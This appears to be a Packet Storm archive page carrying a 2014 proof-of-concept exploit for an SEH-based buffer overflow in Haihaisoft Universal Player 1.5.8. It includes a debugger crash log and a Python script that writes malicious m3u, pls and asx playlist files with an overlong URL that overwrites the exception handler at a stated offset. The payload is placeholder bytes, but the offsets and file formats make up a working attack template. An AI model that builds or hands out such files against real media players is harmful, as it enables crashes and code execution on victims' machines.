Exploit the possiblities

Haihaisoft Universal Player 1.5.8 Buffer Overflow

Haihaisoft Universal Player 1.5.8 Buffer Overflow
Posted Mar 25, 2014
Authored by Gabor Seljan

Haihaisoft Universal Player version 1.5.8 buffer overflow exploit.

tags | exploit, overflow
MD5 | 480cae2a36a16a13163c2e90cfed64f9

Haihaisoft Universal Player 1.5.8 Buffer Overflow

Change Mirror Download
#-----------------------------------------------------------------------------#
# Exploit Title: Haihaisoft Universal Player 1.5.8 - Buffer Overflow (SEH) #
# Date: Mar 25 2014 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.haihaisoft.com/hup.aspx #
# Version: 1.5.8.0 #
# Tested on: Windows XP SP3 #
#-----------------------------------------------------------------------------#

# (6ec.57c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=44444444 ecx=0000000f edx=00000000 esi=04bae7d0 edi=44444448
# eip=0069537f esp=04cb7b18 ebp=04cb7b58 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# *** ERROR: Module load completed but symbols could not be loaded for mplayerc.exe
# mplayerc+0x29537f:
# 0069537f f3ab rep stos dword ptr es:[edi]
# 0:005> g
# (6ec.57c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=43434343 edx=7c9032bc esi=00000000 edi=00000000
# eip=43434343 esp=04cb7748 ebp=04cb7768 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# 43434343 ?? ???
# 0:005> !exchain
# 04cb775c: ntdll!RtlConvertUlongToLargeInteger+7e (7c9032bc)
# 04cb7b4c: mplayerc+2e2e78 (006e2e78)
# 04cb8b80: 43434343
# Invalid exception stack at 42424242

#!/usr/bin/python

junk1 = "\x80" * 50;
offset = "\x41" * 1591;
nSEH = "\x42" * 4;
SEH = "\x43" * 4;
junk2 = "\x44" * 5000;

evil = "http://{junk1}{offset}{nSEH}{SEH}{junk2}".format(**locals())

for e in ['m3u', 'pls', 'asx']:
if e is 'm3u':
poc = evil
elif e is 'pls':
poc = "[playlist]\nFile1={}".format(evil)
else:
poc = "<asx version=\"3.0\"><entry><ref href=\"{}\"/></entry></asx>".format(evil)
try:
print("[*] Creating poc.%s file..." % e)
f = open('poc.%s' % e, 'w')
f.write(poc)
f.close()
print("[*] %s file successfully created!" % f.name)
except:
print("[!] Error while creating exploit file!")

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    0 Files
  • 17
    Jan 17th
    0 Files
  • 18
    Jan 18th
    0 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close